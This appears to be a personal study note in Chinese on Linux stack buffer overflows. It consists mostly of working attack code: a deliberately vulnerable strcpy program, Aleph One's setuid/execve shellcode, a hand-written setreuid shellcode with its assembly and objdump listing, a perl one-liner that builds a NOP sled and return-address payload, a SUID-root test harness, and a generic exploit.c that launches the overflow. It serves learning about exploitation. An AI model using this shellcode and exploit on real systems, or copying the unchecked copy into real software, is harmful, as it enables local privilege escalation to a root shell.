linux缓冲区溢出学习
漏洞代码:
//meet.c
#include<stdio.h>
greeting(char *temp1,char *temp2){
char name[400];
strcpy(name,temp2);
printf("Hello %s %s\n",temp1,name);
}
main(int argc,char *argv[]){
greeting(argv[1],argv[2]);
printf("Bye %s %s\n",argv[1],argv[2]);
}
调试语句:
gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c
gdb meet
list
b 6
`perl -e 'print "A"x403'`
aleph1的shellcode
//shellcode.c
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main(){
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
}
获得当前esp值
#include<stdio.h>
unsigned long get_sp(void){
__asm__("movl %esp,%eax");
}
int main(){
printf("Stack pointer(ESP):0x%x\n",get_sp());}
perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc
./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`
编写自己的shellcode
1.编写汇编
section .text global _start _start: ;setreuid(0,0) xor eax,eax mov al,0x46 xor ebx,ebx xor ecx,ecx int 0x80 ;用execve执行shellcode xor eax,eax push eax push 0x68732f2f push 0x6e69622f mov ebx,esp push eax push ebx mov ecx,esp xor edx,edx mov al,0xb int 0x80
2.生成可执行文件
nasm -f elf sc.asm
ld -o sc sc.o
3.提取十六进制代码
objdump -d ./sc
[root@localhost root]# objdump -d ./sc ./sc: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: 31 c0 xor %eax,%eax 8048082: b0 46 mov $0x46,%al 8048084: 31 db xor %ebx,%ebx 8048086: 31 c9 xor %ecx,%ecx 8048088: cd 80 int $0x80 804808a: 31 c0 xor %eax,%eax 804808c: 50 push %eax 804808d: 68 2f 2f 73 68 push $0x68732f2f 8048092: 68 2f 62 69 6e push $0x6e69622f 8048097: 89 e3 mov %esp,%ebx 8048099: 50 push %eax 804809a: 53 push %ebx 804809b: 89 e1 mov %esp,%ecx 804809d: 31 d2 xor %edx,%edx 804809f: b0 0b mov $0xb,%al 80480a1: cd 80 int $0x80
4.放到程序里面测试shellcode
//sc2.c
char sc[]= "\x31\xc0" "\xb0\x46" "\x31\xdb" "\x31\xc9" "\xcd\x80" "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x31\xd2" "\xb0\x0b" "\xcd\x80"; main() { void (*fp)(void); fp=(void *)sc; fp(); }
5.设置SUID并执行
sudo chown root sc2
sudo chmod +s sc2
./sc2
通用exploit代码
//exploit.c
#include<stdio.h>
char shellcode[]= //setuid(0)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void){
__asm__("movl %esp,%eax");
}
int main(int argc,char *argv[1]){
int i,offset=0;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size=500;
esp=get_sp();
if(argc>1) size=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) esp=strtoul(argv[3],NULL,0);
ret=esp-offset;
fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
buffer=(char *)malloc(size);
ptr=buffer;
addr_ptr=(long *)ptr;
for(i=0;i<size;i+=4){
*(addr_ptr++)=ret;
}
for(i=0;i<size/2;i++){
buffer[i]='\x90';}
ptr=buffer+size/2;
for(i=0;i<strlen(shellcode);i++){
*(ptr++)=shellcode[i];
}
buffer[size-1]=0;
execl("./meet","meet","Mr.",buffer,0);
printf("%s\n",buffer);
free(buffer);
return 0;
}
----------------
Lynx
The quieter you become,the more you are able to hear.
